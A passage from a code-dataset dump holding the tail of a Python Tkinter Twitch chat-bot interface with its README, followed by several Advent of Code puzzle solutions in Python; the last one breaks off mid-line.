self.sendPong(line[1])\r\n\r\n if line[1] == 'PRIVMSG':\r\n sender = self.getSender(line[0])\r\n\r\n message = self.getMessage(line)\r\n\r\n if sender not in self.viewerList:\r\n self.viewerList.append(sender)\r\n self.botApplication.addViewer(sender)\r\n\r\n if self.parseMessages(sender,message):\r\n messageSplit = message.split(\" \")\r\n outgoingMessage = callableCommands[messageSplit[0]].getOutput()\r\n self.sendMessage(CHAN,self.formatMessage(outgoingMessage,message,sender))\r\n else:\r\n if self.botApplication.allowMessages:\r\n messageCount += 1\r\n if messageCount >= int(self.botApplication.rmMessages.get()):\r\n messageCount = 0\r\n self.sendRandomMessage()\r\n print(sender,message)\r\n except ConnectionAbortedError:\r\n self.connected = False\r\n self.botApplication.connectButton.config(text=\"Connect\",command=self.botApplication.connectBot)\r\n \r\n def getTarget(self,msg,sender):\r\n messageSplit = msg.replace(\"@\",\"\").split(\" \")\r\n if messageSplit[1]:\r\n target = messageSplit[1]\r\n else:\r\n target = sender\r\n return target\r\n\r\n def getActiveRM(self):\r\n activeMessages = []\r\n for message in randomMessages:\r\n if message.isActive():\r\n activeMessages.append(message)\r\n return activeMessages\r\n\r\n def getUserLevel(self,sender):\r\n level = 0\r\n if sender in self.getModerators():\r\n level = 1\r\n elif sender == self.CHAN.replace(\"#\",\"\"):\r\n level = 2\r\n return level\r\n\r\n def parseMessages(self,sender,msg):\r\n messageSplit = msg.split(\" \")\r\n if messageSplit[0] in callableCommands:\r\n currentCommand = callableCommands[messageSplit[0]]\r\n if currentCommand.isActive():\r\n if currentCommand.getUserLevel() <= self.getUserLevel(sender):\r\n if currentCommand.isCooleddown():\r\n currentCommand.lastCalled = datetime.datetime.now()\r\n return True\r\n return False\r\n \r\n def getSender(self,msg):\r\n result = \"\"\r\n for char in msg:\r\n if char ==\"!\":\r\n break\r\n if char != \":\":\r\n result += char\r\n return result\r\n\r\n def getMessage(self,msg):\r\n result = \"\"\r\n i = 3\r\n length = len(msg)\r\n\r\n while i < length:\r\n result += msg[i] + \" \"\r\n i += 1\r\n result = result.lstrip(':')\r\n return result\r\n\r\n def formatMessage(self,outgoingMessage,message,sender):\r\n formats = {\"rv%\":random.choice(self.viewerList),\r\n \"RV%\":random.choice(self.viewerList).upper(),\r\n \"v%\":sender,\r\n \"V%\":sender.upper(),\r\n \"t%\":self.getTarget(message,sender).lower(),\r\n \"T%\":self.getTarget(message,sender).upper()}\r\n\r\n for key in formats:\r\n outgoingMessage = \"\".join(outgoingMessage).replace(key,formats[key])\r\n return outgoingMessage\r\n \r\n def sendMessage(self, CHAN, MSG):\r\n self.connection.send(bytes('PRIVMSG {} :{}\\r\\n'.format(CHAN,MSG),'UTF-8'))\r\n \r\n def sendPong(self,MSG):\r\n self.connection.send(bytes('PONG {}\\r\\n'.format(MSG),'UTF-8'))\r\n \r\n def sendPass(self):\r\n self.connection.send(bytes('PASS {}\\r\\n'.format(self.PASS),'UTF-8'))\r\n\r\n def sendNick(self):\r\n self.connection.send(bytes('NICK {}\\r\\n'.format(self.NICK),'UTF-8'))\r\n\r\n def joinChannel(self):\r\n self.connection.send(bytes('JOIN {}\\r\\n'.format(self.CHAN),'UTF-8'))\r\n\r\n def partChannel(self):\r\n self.connection.send(bytes('PART {}\\r\\n'.format(self.CHAN),'UTF-8'))\r\n \r\nclass CommandDialog():\r\n def __init__(self,parent,name=None,description=None,output=None,active=True,userLevel=\"viewer\",cooldown=5):\r\n self.parent = parent\r\n self.top = tk.Tk()\r\n\r\n self.nameLabel = tk.Label(self.top,text=\"Name: \")\r\n self.nameLabel.grid(column=1,row=1)\r\n self.nameEntry = tk.Entry(self.top)\r\n self.nameEntry.grid(column=2,row=1)\r\n\r\n self.descLabel = tk.Label(self.top,text=\"Description: \")\r\n self.descLabel.grid(column=1,row=2)\r\n self.descEntry = tk.Entry(self.top)\r\n self.descEntry.grid(column=2,row=2)\r\n\r\n self.outLabel = tk.Label(self.top,text=\"Output: \")\r\n self.outLabel.grid(column=1,row=3)\r\n self.outEntry = tk.Entry(self.top)\r\n self.outEntry.grid(column=2,row=3)\r\n\r\n self.active = active\r\n\r\n self.activeLabel = tk.Label(self.top,text=\"Active: \")\r\n self.activeLabel.grid(column=1,row=4)\r\n self.activeEntry = tk.Checkbutton(self.top,command=self.updateActive)\r\n self.activeEntry.grid(column=2,row=4)\r\n\r\n self.ulLabel = tk.Label(self.top,text=\"User Level: \")\r\n self.ulLabel.grid(column=1,row=5)\r\n self.ulVariable = tk.StringVar(self.top)\r\n self.ulVariable.set(userLevel)\r\n self.ulEntry = tk.OptionMenu(self.top, self.ulVariable, \"viewer\", \"moderator\", \"broadcaster\")\r\n self.ulEntry.grid(column=2,row=5)\r\n\r\n self.cdLabel = tk.Label(self.top,text=\"Cooldown: \")\r\n self.cdLabel.grid(column=1,row=6)\r\n self.cdInput = tk.Spinbox(self.top,from_=0, to=120)\r\n self.cdInput.grid(column=2,row=6)\r\n\r\n #Insert Default Data\r\n self.originalName = name\r\n if name:\r\n self.nameEntry.insert(0,name)\r\n if description:\r\n self.descEntry.insert(0,description)\r\n if output:\r\n self.outEntry.insert(0,output)\r\n if active:\r\n self.activeEntry.select()\r\n if cooldown:\r\n self.cdInput.delete(0,tk.END)\r\n self.cdInput.insert(0,cooldown)\r\n #\r\n\r\n self.submitButton = tk.Button(self.top, text=\"Submit\",command=self.submitCommand)\r\n self.submitButton.grid(column=1,row=7)\r\n\r\n self.cancelButton = tk.Button(self.top, text=\"Cancel\",command=self.cancelCommand)\r\n self.cancelButton.grid(column=2,row=7)\r\n\r\n def updateActive(self):\r\n self.active = not(self.active)\r\n def cancelCommand(self):\r\n self.top.destroy()\r\n \r\n def submitCommand(self):\r\n name = self.nameEntry.get()\r\n description = self.descEntry.get()\r\n active = self.active\r\n output = self.outEntry.get()\r\n userLevel = self.ulVariable.get()\r\n cooldown = self.cdInput.get()\r\n\r\n callableCommands[name] = command(name,description,output,active,None,userLevel,cooldown)\r\n\r\n edit = False\r\n field = None\r\n \r\n if self.originalName:\r\n for item in self.parent.ccList.get_children():\r\n temp = self.parent.ccList.item(item,\"values\")\r\n if temp[1] == self.originalName:\r\n edit = True\r\n field = item\r\n\r\n if edit:\r\n index = self.parent.ccList.get_children().index(field)\r\n self.parent.ccList.delete(field)\r\n self.parent.ccList.insert(parent='',index=index, values=callableCommands[name].getValues()) \r\n else:\r\n index = len(self.parent.ccList.get_children())\r\n self.parent.ccList.insert(parent='',index=index, values=callableCommands[name].getValues())\r\n self.top.destroy()\r\n\r\nclass Application():\r\n def __init__(self,bot):\r\n self.bot = bot\r\n self.window = tk.Tk()\r\n self.window.title(\"Bot Interface\")\r\n\r\n self.window.geometry(\"705x365\")\r\n self.window.resizable(False,False)\r\n\r\n self.connected = False\r\n\r\n self.channelFrame = tk.LabelFrame(self.window, text=\"Channel: \",padx=5,pady=5)\r\n self.channelName = tk.Entry(master=self.channelFrame,justify=\"right\")\r\n self.connectButton = tk.Button(master=self.channelFrame,text=\"Connect\",command=self.connectBot)\r\n\r\n self.commandsFrame = tk.LabelFrame(self.window, text=\"Commands: \",padx=5,pady=5)\r\n self.notebook = ttk.Notebook(self.commandsFrame)\r\n self.ccFrame = tk.Frame(self.notebook)\r\n self.randomFrame = tk.Frame(self.notebook)\r\n\r\n ######################Callable Commands List#################\r\n self.ccList = ttk.Treeview(self.ccFrame)\r\n self.ccList['columns'] = ('Active','Name','Description','Output','User Level')\r\n self.ccList.column(\"#0\", width=0, stretch=tk.NO)\r\n self.ccList.column(\"Active\", anchor=tk.CENTER, width=45)\r\n self.ccList.column(\"Name\", anchor=tk.CENTER, width=65)\r\n self.ccList.column(\"Description\", anchor=tk.CENTER, width=80)\r\n self.ccList.column(\"Output\", anchor=tk.CENTER, width=110)\r\n self.ccList.column(\"User Level\", anchor=tk.CENTER, width=50)\r\n\r\n self.ccList.heading('#0', text='', anchor=tk.CENTER)\r\n self.ccList.heading('Active', text='Active', anchor=tk.CENTER)\r\n self.ccList.heading('Name', text='Name', anchor=tk.CENTER)\r\n self.ccList.heading('Description', text='Description', anchor=tk.CENTER)\r\n self.ccList.heading('Output', text='Output', anchor=tk.CENTER)\r\n self.ccList.heading('User Level', text='User Level', anchor=tk.CENTER)\r\n\r\n for item in callableCommands:\r\n commandValues=callableCommands[item].getValues()\r\n self.ccList.insert(parent='',index=0, values=commandValues)\r\n\r\n self.ccAddButton = tk.Button(master=self.ccFrame,text=\"Add\",command=self.ccAddCommand)\r\n self.ccActivateButton = tk.Button(master=self.ccFrame,text=\"Activate\",command=self.ccActivatePress,state='disabled')\r\n self.ccEditButton = tk.Button(master=self.ccFrame,text=\"Edit\",command=self.ccEditCommand,state='disabled')\r\n self.ccDeleteButton = tk.Button(master=self.ccFrame,text=\"Delete\",state='disabled',command=self.ccDeleteCommand) \r\n\r\n self.ccList.bind(\"<Double-Button-1>\",self.ccButtonActivation)\r\n self.ccAddButton.place(x=450,y=5,width=75)\r\n self.ccEditButton.place(x=450,y=35,width=75)\r\n self.ccActivateButton.place(x=450,y=65,width=75)\r\n self.ccDeleteButton.place(x=450,y=199,width=75)\r\n\r\n self.ccListScrollbar = tk.Scrollbar(self.ccFrame)\r\n self.ccListScrollbar.config(command=self.ccList.yview)\r\n self.ccList.config(yscrollcommand = self.ccListScrollbar.set)\r\n self.ccListScrollbar.place(x=430,y=5,height=220)\r\n\r\n self.rmList = ttk.Treeview(self.randomFrame)\r\n self.rmList['columns'] = ('Index','Active','Output')\r\n self.rmList.column('#0', width=0, stretch=tk.NO)\r\n self.rmList.column('Index', width=25, stretch=tk.NO)\r\n self.rmList.column('Active', width=45, stretch=tk.NO)\r\n self.rmList.column('Output', width=353, stretch=tk.NO)\r\n\r\n self.rmList.heading('#0', text='', anchor=tk.CENTER)\r\n self.rmList.heading('Index', text='#', anchor=tk.CENTER)\r\n self.rmList.heading('Active', text='Active', anchor=tk.CENTER)\r\n self.rmList.heading('Output', text='Output', anchor=tk.CENTER)\r\n\r\n for index in range(len(randomMessages)):\r\n messageValues=randomMessages[index].getValues(index)\r\n self.rmList.insert(parent='',index=index, values=messageValues)\r\n\r\n self.rmAddButton = tk.Button(master=self.randomFrame,text=\"Add\",command=self.rmAddMessage)\r\n self.rmActivateButton = tk.Button(master=self.randomFrame,text=\"Activate\",command=self.rmActivatePress,state='disabled')\r\n self.rmEditButton = tk.Button(master=self.randomFrame,text=\"Edit\",command=self.rmEditMessage,state='disabled')\r\n self.rmDeleteButton = tk.Button(master=self.randomFrame,text=\"Delete\",state='disabled',command=self.rmDeleteMessage)\r\n \r\n self.rmList.bind(\"<Double-Button-1>\",self.rmButtonActivation)\r\n\r\n self.rmAddButton.place(x=450,y=5,width=75)\r\n self.rmEditButton.place(x=450,y=35,width=75)\r\n self.rmActivateButton.place(x=450,y=65,width=75)\r\n self.rmDeleteButton.place(x=450,y=199,width=75)\r\n\r\n self.rmListScrollbar = tk.Scrollbar(self.randomFrame)\r\n self.rmListScrollbar.config(command=self.rmList.yview)\r\n self.rmList.config(yscrollcommand = self.rmListScrollbar.set)\r\n self.rmListScrollbar.place(x=430,y=5,height=220)\r\n \r\n ##################################################################\r\n\r\n self.notebook.add(self.ccFrame, text=\"Callable Commands\")\r\n self.notebook.add(self.randomFrame, text=\"Random Messages\")\r\n\r\n ##################################################################\r\n\r\n #####################Viewer List##################################\r\n self.viewerFrame = tk.LabelFrame(self.window, text=\"Viewers: \",padx=5,pady=5)\r\n self.viewerListbox = tk.Listbox(self.viewerFrame,activestyle=\"none\",exportselection=False,height=285)\r\n\r\n self.viewerListbox.pack()\r\n self.viewerFrame.place(x=5,y=75,height=285,width=138)\r\n ##################################################################\r\n\r\n self.channelName.insert(0,CHAN)\r\n self.channelName.pack()\r\n self.connectButton.pack()\r\n self.channelFrame.place(x=5,y=0,height=75)\r\n\r\n self.ccList.place(x=5,y=5,height=220,width=425)\r\n self.rmList.place(x=5,y=5,height=220,width=425)\r\n\r\n self.notebook.place(x=0,y=0,width=535,height=255)\r\n self.commandsFrame.place(x=150,y=75,height=285,width=550)\r\n\r\n self.settingsFrame = tk.LabelFrame(self.window, text=\"Settings: \",padx=5,pady=5)\r\n self.nickLabel = tk.Label(self.settingsFrame, text=\"User: \")\r\n self.nickEntry = tk.Entry(master=self.settingsFrame,justify=\"right\",width=35)\r\n self.nickEntry.insert(0,NICK)\r\n self.nickLabel.place(x=0,y=0)\r\n self.nickEntry.place(x=50,y=0)\r\n\r\n self.oauthLabel = tk.Label(self.settingsFrame, text=\"Oauth: \")\r\n self.oauthEntry = tk.Entry(master=self.settingsFrame,justify=\"right\",width=35)\r\n self.oauthEntry.insert(0,PASS)\r\n self.oauthLabel.place(x=0,y=20)\r\n self.oauthEntry.place(x=50,y=20)\r\n\r\n self.separator = ttk.Separator(self.settingsFrame,orient='vertical')\r\n self.separator.place(x=270,y=-5,height=50)\r\n\r\n self.iterateRM = RMIT\r\n\r\n self.iterateLabel = tk.Label(self.settingsFrame,text=\"Message Iteration: \")\r\n self.iterateLabel.place(x=280,y=0)\r\n self.iterateEntry = tk.Checkbutton(self.settingsFrame,command=self.updateIteration)\r\n self.iterateEntry.place(x=380,y=0)\r\n if self.iterateRM:\r\n self.iterateEntry.select()\r\n\r\n #Checkbox = Command = StartCountdown\r\n #Checkbox = Allow Message Countdown\r\n\r\n self.rmMessages = tk.Spinbox(self.settingsFrame,from_=1, to=5000)\r\n\r\n self.rmMessages.delete(0,tk.END)\r\n self.rmMessages.insert(0,EMES)\r\n \r\n self.rmMessageLabel = tk.Label(self.settingsFrame,text=\"Messages: \")\r\n\r\n self.rmMessages.place(x=490,y=0,width=40)\r\n self.rmMessageLabel.place(x=415,y=0)\r\n\r\n self.allowMessages = AMES\r\n\r\n self.rmAMessageLabel = tk.Label(self.settingsFrame,text=\"Random Message Active: \")\r\n self.rmMessagesCheck = tk.Checkbutton(self.settingsFrame,command=self.updateAMes)\r\n\r\n if self.allowMessages:\r\n self.rmMessagesCheck.select()\r\n\r\n self.settingsLocked = True\r\n self.lockButton = tk.Button(self.settingsFrame,text=\"Unlock\",command=self.settingsLock)\r\n \r\n self.rmAMessageLabel.place(x=280,y=20)\r\n self.rmMessagesCheck.place(x=420,y=20)\r\n self.lockButton.place(x=480,y=20,width=50)\r\n\r\n self.rmMessagesCheck.config(state=\"disabled\")\r\n self.rmMessages.config(state=\"disabled\")\r\n self.iterateEntry.config(state=\"disabled\")\r\n self.oauthEntry.config(state=\"disabled\")\r\n self.nickEntry.config(state=\"disabled\")\r\n #Random Messages Settings\r\n #Number of Messages\r\n #Time between Messages\r\n \r\n self.settingsFrame.place(x=150,y=0,height=75,width=550)\r\n\r\n self.window.protocol(\"WM_DELETE_WINDOW\", self.on_closing)\r\n self.window.mainloop()\r\n\r\n def settingsLock(self):\r\n self.settingsLocked = not(self.settingsLocked)\r\n if self.settingsLocked:\r\n self.lockButton.config(text=\"Unlock\")\r\n self.rmMessagesCheck.config(state=\"disabled\")\r\n self.rmMessages.config(state=\"disabled\")\r\n self.iterateEntry.config(state=\"disabled\")\r\n self.oauthEntry.config(state=\"disabled\")\r\n self.nickEntry.config(state=\"disabled\")\r\n else:\r\n self.lockButton.config(text=\"Lock\")\r\n self.rmMessagesCheck.config(state=\"normal\")\r\n self.rmMessages.config(state=\"normal\")\r\n self.iterateEntry.config(state=\"normal\")\r\n self.oauthEntry.config(state=\"normal\")\r\n self.nickEntry.config(state=\"normal\")\r\n \r\n def updateAMin(self):\r\n self.allowMinutes = not(self.allowMinutes)\r\n\r\n def updateAMes(self):\r\n self.allowMessages = not(self.allowMessages)\r\n \r\n def updateIteration(self):\r\n self.iterateRM = not(self.iterateRM)\r\n \r\n def addViewer(self,viewerName):\r\n self.viewerListbox.insert(self.viewerListbox.size(),viewerName)\r\n \r\n def ccActivatePress(self):\r\n temp = self.ccList.item(self.ccList.focus(),\"values\")\r\n command = callableCommands[temp[1]]\r\n command.invertActive()\r\n if command.isActive():\r\n self.ccActivateButton.config(text=\"Deactivate\")\r\n else:\r\n self.ccActivateButton.config(text=\"Activate\")\r\n self.ccList.item(self.ccList.focus(),values=command.getValues())\r\n\r\n def ccAddCommand(self):\r\n CommandDialog(self)\r\n \r\n def ccDeleteCommand(self):\r\n try:\r\n temp = self.ccList.item(self.ccList.focus(),\"values\")\r\n answer = messagebox.askokcancel(\"Question\",f\"Delete Command {temp[1]}\")\r\n if answer:\r\n callableCommands.pop(temp[1],None)\r\n self.ccList.delete(self.ccList.focus())\r\n except:\r\n pass\r\n\r\n def ccEditCommand(self):\r\n try:\r\n temp = self.ccList.item(self.ccList.focus(),\"values\")\r\n command = callableCommands[temp[1]]\r\n CommandDialog(self,command.name,command.description,command.output,command.active,command.userLevel,command.cooldown) \r\n except:\r\n pass\r\n \r\n def ccButtonActivation(self,event):\r\n temp = self.ccList.item(self.ccList.focus(),\"values\")\r\n if temp[0] == tick:\r\n self.ccActivateButton.config(text=\"Deactivate\")\r\n else:\r\n self.ccActivateButton.config(text=\"Activate\")\r\n self.ccActivateButton.config(state=\"active\")\r\n self.ccEditButton.config(state=\"active\")\r\n self.ccDeleteButton.config(state=\"active\")\r\n ###############################################\r\n\r\n ####################Random Commands List#####################\r\n\r\n def rmActivatePress(self):\r\n try:\r\n index = self.rmList.get_children().index(self.rmList.focus())\r\n message = randomMessages[index]\r\n message.invertActive()\r\n if message.isActive():\r\n self.rmActivateButton.config(text=\"Deactivate\")\r\n else:\r\n self.rmActivateButton.config(text=\"Activate\")\r\n self.rmList.item(self.rmList.focus(),values=message.getValues(index))\r\n except:\r\n pass\r\n \r\n def rmDeleteMessage(self):\r\n try:\r\n index = self.rmList.get_children().index(self.rmList.focus())\r\n temp = self.rmList.item(self.rmList.focus(),\"values\")\r\n answer = messagebox.askokcancel(message=f\"Delete Message #{temp[0]}\")\r\n if answer:\r\n randomMessages.pop(index)\r\n self.rmList.delete(self.rmList.focus())\r\n except:\r\n pass\r\n\r\n def rmAddMessage(self):\r\n try:\r\n newMessage = simpledialog.askstring(title=\"\",prompt=\"Input Message: \",parent=self.window)\r\n if newMessage:\r\n newMessage = message(newMessage)\r\n randomMessages.append(newMessage)\r\n index = len(self.rmList.get_children())\r\n self.rmList.insert(parent='',index=index, values=newMessage.getValues(index))\r\n except:\r\n pass\r\n\r\n def rmEditMessage(self):\r\n try:\r\n index = self.rmList.get_children().index(self.rmList.focus())\r\n newMessage = simpledialog.askstring(title=\"\",prompt=\"Input Message: \",parent=self.window)\r\n randomMessages[index].message = newMessage\r\n \r\n self.rmList.item(self.rmList.focus(),values=randomMessages[index].getValues(index))\r\n except Exception as e:\r\n print(e)\r\n \r\n def rmButtonActivation(self,event):\r\n temp = self.rmList.item(self.rmList.focus(),\"values\")\r\n index = int(temp[0])\r\n if temp[1] == tick:\r\n self.rmActivateButton.config(text=\"Deactivate\")\r\n else:\r\n self.rmActivateButton.config(text=\"Activate\")\r\n self.rmActivateButton.config(state=\"active\")\r\n self.rmEditButton.config(state=\"active\")\r\n self.rmDeleteButton.config(state=\"active\")\r\n \r\n #####################################################\r\n\r\n #####################Built In Commands List######################\r\n\r\n def connectBot(self):\r\n self.bot.startConnection(self)\r\n self.connectButton.config(text=\"Disconnect\",command=self.disconnectBot)\r\n\r\n def disconnectBot(self):\r\n self.bot.stopConnection()\r\n self.connectButton.config(text=\"Connect\",command=self.connectBot)\r\n\r\n def getBotValues(self):\r\n botInfo = {\"CHAN\":self.channelName.get(),\r\n \"NICK\":self.nickEntry.get(),\r\n \"PASS\":self.oauthEntry.get(),\r\n \"RMIT\":self.iterateRM,\r\n \"AMES\":self.allowMessages,\r\n \"EMES\":self.rmMessages.get()}\r\n return botInfo\r\n \r\n def on_closing(self):\r\n botInfo = self.getBotValues()\r\n pickle.dump(botInfo,open(\"botCredentials.p\",\"wb\"))\r\n pickle.dump(callableCommands,open(\"CommandsList.p\",\"wb\"))\r\n pickle.dump(randomMessages,open(\"randomMessages.p\",\"wb\"))\r\n self.window.destroy()\r\n\r\nbot = Bot()\r\nApplication(bot)\r\n" }, { "alpha_fraction": 0.7638232707977295, "alphanum_fraction": 0.7643789649009705, "avg_line_length": 63.26785659790039, "blob_id": "f6078efe830dc50da30effee7cc1cd84d64bf33c", "content_id": "cfd2b1494be34db59797ddbbfd6e192c8543811d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3599, "license_type": "no_license", "max_line_length": 275, "num_lines": 56, "path": "/README.md", "repo_name": "DominicMuckzZ/Twitch-Bot-Interface", "src_encoding": "UTF-8", "text": "# Twitch-Bot-Interface\nThe application provides an interface for a custom bot \nAllowing users to set up custom commands for viewers to use, messages to be output after every nth message and show a list of all participants of the chat for the current connection to Twitch's irc. \n\n## Setting Up\nTo set up and connect to a channel you need three pieces of information \n* The bot username\n* The bot oauth password (https://twitchapps.com/tmi/)\n * This must include the 'oauth:' part of the string\n* And the name of the channel you want to connect to (proceed this by a #)\nOnce these fields are filled in you can connect the bot.\n\nThe application provides a navigatable user interface that allows users to set up either \"Callable Commands\" or \"Random Messages\". \n## Callable Commands \nallow for a user to type the name of the command into twitch's chat function and receive a response provided certain criteria is met. \nThe criteria can be: \n * A cooldown between messages \n * A certain \"User Level\" the viewer must be \n * This allows for Moderator or Broadcaster only commands \n * If the command is \"Active\" and available for use by viewers \n \n### Callable Commands Formatting:\nKey | Output\n---|------\nt% | The word/name following the command, if there is no word the channel name\nT% | The capitalised work/name following the command, if there is no word, the channel name\nv% | The command caller's (message sender's) name\nV% | The command caller's (message sender's) capitalised name\nrv% | A random chatter's name from the viewer list\nRV% | A random chatter's capitalised name from the viewer list\n\n## Random Messages \nallow for an output into the chat upon every nth message received \nThese messages do not have incredibly flexible settings \n * They can be turned on/off, either individually or all together \n * They can be set to iterate instead of randomise so that the messages will not repeat by accident \n * The nth number is changeable \n \nThe settings for both Random Messages and Callable Commands are asyncronous and so they can be changed whilst the bot is in use. \nFor example: \n * The random messages can be turned off for 10 messages and then turned back on. This will prevent the bot from counting these messages and so delaying the output. \n * The number of messages required before a random message is output can be changed. \n \nOther settings such as oauth, nick, and channel need to be set up before the bot is connected otherwise it will refuse to connect. \nThese can be adjusted whilst the bot is connected but will not affect the bot's ability to connect until the next attempt to start a connection \nThe settings for the bot and commands save upon exit of the application and will be remembered for the next use. \n\n## Current Limitations: \n* There is no built in API access which would allow live data to be retrieved from Twitch \n* Only one bot \"profile\" is available and so values must be changed if it is to be used on another channel. \n* Duplicate command names can not be in use, therefore you are unable to have two commands that share the name \"!so\" and have two different outputs based on this. \n * In future updates this may be changed to have the Callable Commands work off a listed system instead of a dictionary, this would allow multiple commands to be used, ones that pertain to the viewers user level to be prioritised and an output be based off these criteria. \n* A moderator will not be immediately recognised when they come into chat. \n\n### New Updates:\nThe list of moderators is dynamic and is received through Twitch\n" } ]
2
erchiggins/advent-of-code
https://github.com/erchiggins/advent-of-code
8820e99c549a10ddfb9d5f841e88a4b973f73313
bf5e7242d9322accb9586d513f70443e2d51e21d
2cc0b465c1bc11edfbdc5d31f05701ee9e393269
refs/heads/master
2020-12-08T04:28:38.626153
2020-01-30T20:48:25
2020-01-30T20:48:25
232,884,425
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6205962300300598, "alphanum_fraction": 0.6341463327407837, "avg_line_length": 29.33333396911621, "blob_id": "952614087c5a4c7905547685395b104c3033b3ea", "content_id": "40508a3faf4480a1716876e214318a72c96ff551", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 369, "license_type": "no_license", "max_line_length": 55, "num_lines": 12, "path": "/day3.py", "repo_name": "erchiggins/advent-of-code", "src_encoding": "UTF-8", "text": "# read in from file\n# process each path as a set of tuples with coordinates\n# (model steps RLUD as individual segments)\n# find intersect of sets of tuples \n# minimum value in intersection\n\n\nif __name__ == \"__main__\":\n with open('day3input.txt') as f:\n raw_input = f.readlines()\n wire_0 = raw_input[0].split(',')\n wire_1 = raw_input[1].split(',')\n \n" }, { "alpha_fraction": 0.47474047541618347, "alphanum_fraction": 0.5031141638755798, "avg_line_length": 28.83333396911621, "blob_id": "f6636a995105e4194566131ea9dbc02dd4ec20bb", "content_id": "83fd7692377035cf0e3f788b2a3ca2a1259033e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1445, "license_type": "no_license", "max_line_length": 73, "num_lines": 48, "path": "/day2.py", "repo_name": "erchiggins/advent-of-code", "src_encoding": "UTF-8", "text": " \ndef computer(tape):\n index = 0\n while True:\n instruction = tape[index]\n if instruction == 1:\n tape[tape[index+3]] = tape[tape[index+1]]+tape[tape[index+2]]\n elif instruction == 2:\n tape[tape[index+3]] = tape[tape[index+1]]*tape[tape[index+2]]\n elif instruction == 99:\n # print('Opcode 99, program complete')\n break\n else:\n raise Exception(f'Unknown opcode {instruction}!')\n index += 4\n return tape\n\ndef find_result(input_strings):\n noun = 0\n while noun <= 99:\n verb = 0\n while verb <= 99:\n # (re)set input ints\n input_ints = [int(input) for input in input_strings]\n input_ints[1] = noun\n input_ints[2] = verb\n # check combination\n result = computer(input_ints)[0]\n print(result)\n if result == 19690720:\n print('result found!')\n print(result)\n print(f'noun = {noun}, verb = {verb}')\n return (noun, verb)\n verb += 1\n noun += 1\n\n# this is like the main method!\nif __name__ == \"__main__\":\n with open('day2input.txt') as f:\n raw_input = f.read()\n input_strings = raw_input.split(',')\n # part 1\n # input_ints[1] = 12\n # input_ints[2] = 2\n # print(computer(input_ints))\n\n # part 2\n print(find_result(input_strings))\n \n" }, { "alpha_fraction": 0.5766209959983826, "alphanum_fraction": 0.5844748616218567, "avg_line_length": 31.577381134033203, "blob_id": "6ff198bef9582ff7a288570f904a040d1b87f22a", "content_id": "9c0d6306d1917f5119b5345be253e0f9114c73ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5475, "license_type": "no_license", "max_line_length": 159, "num_lines": 168, "path": "/day18.py", "repo_name": "erchiggins/advent-of-code", "src_encoding": "UTF-8", "text": "# directions key for neighbor discovery\n# NORTH = (-1, 0)\n# SOUTH = ( 1 0)\n# EAST = ( 0, 1)\n# WEST = ( 0, -1)\n\n# returns tuple of N/S/E/W neighbor if it exists\n\n\ndef get_neighbor(pos, direction, height, width):\n r = pos[0]\n c = pos[1]\n if direction == \"NORTH\" and r > 0:\n return (r - 1, c)\n if direction == \"SOUTH\" and r < height - 1:\n return (r+1, c)\n if direction == \"EAST\" and c < width - 1:\n return (r, c+1)\n if direction == \"WEST\" and c > 0:\n return (r, c-1)\n return None\n\n\ndef build_distances():\n \"\"\"\n should take\n * the map\n * current position\n * visited\n\n returns\n a tree\n \"\"\"\n pass\n\n\ndef flood_from(map, starting_pos):\n \"\"\"\n takes a starting position, and returns\n a dictionary of of the distances to all the\n other values (keys and doors) in the maze.\n eg\n {\"a\": (3,'ADF'), {dist:3, keys:'} ...}\n we can have\n keys\n doors\n empty\n wall\n \"\"\"\n to_visit = [(starting_pos, 0, \"\")]\n visited = set()\n distances = {}\n height = len(map)\n width = len(map[0])\n while to_visit:\n # grab next space to visit\n (position, distance_travelled, doors) = to_visit.pop()\n # check all its neighbors\n for direction in [\"NORTH\", \"SOUTH\", \"EAST\", \"WEST\"]:\n neigh = get_neighbor(position, direction, height, width)\n if neigh and (neigh not in visited):\n # neighbor exists and has not been explored\n val = map[neigh[0]][neigh[1]]\n if is_key(val):\n # found a key to add to the distances dict\n distances[val] = {'dist':distance_travelled + 1, 'behind': doors}\n if is_not_wall(val):\n if is_door(val):\n to_visit.append((neigh, distance_travelled + 1, doors+val,))\n else:\n to_visit.append((neigh, distance_travelled + 1, doors,))\n visited.add(position)\n return distances\n\ndef is_not_wall(val):\n return val != '#'\n\ndef is_key(val):\n return val.isalpha() and val.islower()\n\ndef is_door(val):\n return val.isalpha() and val.isupper()\n\ndef find_doors_and_keys(map):\n \"\"\"returns a dictionary of {'A': (r,c), ...} indexes\n of all the places in the map that are\n a door or a key.\n \"\"\"\n results = {}\n for row_idx, row in enumerate(map):\n for col_idx, col in enumerate(row):\n if is_key(col) or is_door(col):\n results[col] = (row_idx, col_idx)\n return results\n\ndef is_accessible(behind, keys):\n \"\"\" returns whether all keys to open doors in 'behind' string\n have been obtained \n keys is a list representing keys obtained so far\n \"\"\"\n return all([door.lower() in keys for door in behind])\n\n# keys is which keys have been obtains so far\ndef find_accessible(distances, current_pos, keys):\n options = distances[current_pos]\n # filter out options which are behind no doors, or doors for which we have keys\n # accessible = []\n # for key, details in options.items():\n # if is_accessible(details['behind'], keys):\n # accessible.append(key)\n return [key for key,details in options.items() \n if is_accessible(details['behind'], keys)]\n\ndef find_shortest_path(distances, num_keys):\n best_distance =10000000000000\n best_path = []\n paths_to_explore = [('@', [], 0)]\n while paths_to_explore:\n current_pos, keys_collected, distance_travelled = paths_to_explore.pop()\n print(f\"got all the keys with travelled {distance_travelled}, path was {keys_collected}. We have {len(keys_collected)} keys and want {num_keys} keys.\")\n if len(keys_collected) == num_keys:\n if distance_travelled < best_distance:\n best_distance = distance_travelled\n best_path = keys_collected\n options = [option for option in find_accessible(distances, current_pos, keys_collected) if option not in keys_collected]\n for option in options:\n # look up distance to key which is option\n # print(distances[current_pos])\n dist_to_key = distances[current_pos][option]['dist']\n paths_to_explore.append((option, keys_collected+[option], distance_travelled+dist_to_key))\n return best_path\n\n\n# create map and find starting position\n# map_strings = \"\"\"#########\n# #[email protected]#\n# #########\"\"\".split('\\n')\ninput = \"\"\"########################\n#...............b.C.D.f#\n#.######################\n#[email protected]#\n########################\"\"\"\nmap_strings = input.split('\\n')\nprint(input)\nmap = [list(s) for s in map_strings]\nheight = len(map)\nwidth = 